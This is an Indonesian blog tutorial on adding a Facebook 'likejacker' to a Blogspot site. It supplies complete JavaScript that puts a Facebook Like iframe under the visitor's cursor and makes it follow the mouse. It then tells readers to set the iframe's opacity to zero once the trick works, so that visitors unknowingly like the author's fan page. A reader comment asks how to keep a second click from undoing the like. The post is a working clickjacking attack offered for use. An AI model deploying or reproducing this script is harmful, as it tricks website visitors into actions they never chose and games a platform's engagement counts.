Cara Membuat Facebook Like jacker untuk blogspot

langsung aja sob, kali ini gw mau share sedikit ilmu yang gw dapet dari si mbah google :p. emang repost wkwk tapi semakin banyak di posting informasi bakal semakin luas dan mudah2an sobat tau likejacker dari blog ane :p
langsung aja nih..gw akan jelasin beberapa langkah supaya blog sobat terpasang likejacker, yang belum tau likejacker silahkan keliling google lg ya :p

1. langkah pertama silahkan copy code di bawah ini.

<script language='javascript'>var fan_page_url = 'http://www.facebook.com/NamaFansPage'
var opacity = 0.6;
var time = 60000;</script>

2. Copy lagi kode berikut ini mas bro dan paste ke notepad. save as beri nama .js

if((document.getElementById) && window.addEventListener || window.attachEvent){
    (function(){
        var hairCol = "#ff0000";

        var d = document;
        var my = -10;
        var mx = -10;
        var r;
        var vert = "";

        var idx = document.getElementsByTagName('div').length;

        var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=like&amp;colorscheme=light&amp;height=80' style='position:absolute;width:53px;height:23px;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
        document.write(thehairs);
        var like = document.getElementById("theiframe");
        document.getElementsByTagName('body')[0].appendChild(like);

        var pix = "px";
        var domWw = (typeof window.innerWidth == "number");
        var domSy = (typeof window.pageYOffset == "number");

        if (domWw)
            r = window;
        else{
            if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
                r = d.documentElement;
            else{
                if (d.body && typeof d.body.clientWidth == "number")
                    r = d.body;
            }
        }

       
        if(time != 0){
            setTimeout(function(){
                        document.getElementsByTagName('body')[0].removeChild(like);

                        if (window.addEventListener){
                            document.removeEventListener("mousemove",mouse,false);
                        } 
                        else if (window.attachEvent){
                            document.detachEvent("onmousemove",mouse);
                        }
                    }, time);
        }

        function scrl(yx){
            var y,x;
            if (domSy){
                y = r.pageYOffset;
                x = r.pageXOffset;
            }
            else{
                y = r.scrollTop;
                x = r.scrollLeft;
            }
            return (yx == 0) ? y:x;
        }

        function mouse(e){
            var msy = (domSy)?window.pageYOffset:0;
            if (!e)
                e = window.event;   
            if (typeof e.pageY == 'number'){
                my = e.pageY - 5 - msy;
                mx = e.pageX - 4;
            }
            else{
                my = e.clientY - 6 - msy;
                mx = e.clientX - 6;
            }
            vert.top = my + scrl(0) + pix;
            vert.left = mx + pix;
        }

        function ani(){
            vert.top = my + scrl(0) + pix;
            setTimeout(ani, 300);
        }


        function init(){
            vert = document.getElementById("theiframe").style;
            ani();
        }

        if (window.addEventListener){
            window.addEventListener("load",init,false);
            document.addEventListener("mousemove",mouse,false);
        } 
        else if (window.attachEvent){
            window.attachEvent("onload",init);
            document.attachEvent("onmousemove",mouse);
        }

    })();
}

3. upload script nomer 2 tadi ke domain yang berbasis wp
misal mas bro upload ke root folder upgrade, berarti akan dihasilkan url dari script tersebut ttp://domain.com/wp-content/upgrade/like.js'/

4. saatnya edit template blogspot
cari (biar lebih cepet pake ctrl+f) dan paste code nomer 1 diatasnya
cari dan paste url script nomer 2 tadi di bawahnya. sehingga jadinya

5. edit script nomer 1
warna merah : url fanspage sobat

agar tingkat keterlihatan, 0 berarti tombol likenya tidak terlihat, 1 berarti terlihat jelas. untuk testing, pilih 0,6 dulu aja mas bro. Kalo udah work baru di set 0
warna orange : countdown (dalam miliseconds). 60000 berarti tombol likenya akan hilang dalam waktu 60 detik. gimana agar tombol likenya ada terus? tulis saja 0, tapi visitor tidak akan bisa ngeklik link


6) tanyakan apabila masih bingung


enjoyy :p

Anda sedang membaca artikel tentang Cara Membuat Facebook Like jacker untuk blogspot dan anda bisa menemukan artikel Cara Membuat Facebook Like jacker untuk blogspot ini dengan url http://sevenfrogz.blogspot.com/2012/03/facebook-like-jacer-untuk-blogspot.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Cara Membuat Facebook Like jacker untuk blogspot ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Cara Membuat Facebook Like jacker untuk blogspot sebagai sumbernya.

Share it to your friends..!

Share to Facebook Share this post on twitter Bookmark Delicious Digg This Stumbleupon Reddit Yahoo Bookmark Furl-Diigo Google Bookmark Technorati Newsvine Tips Triks Blogger, Tutorial SEO, Info

1 comment:

  1. Kalau klik dua kali bisa unlike ya bro? Cara mencegah biar gak klik 2x gimana? Minimal mendisable script ini setelah visitor klik sekali.

    ReplyDelete

Related Posts Plugin for WordPress, Blogger...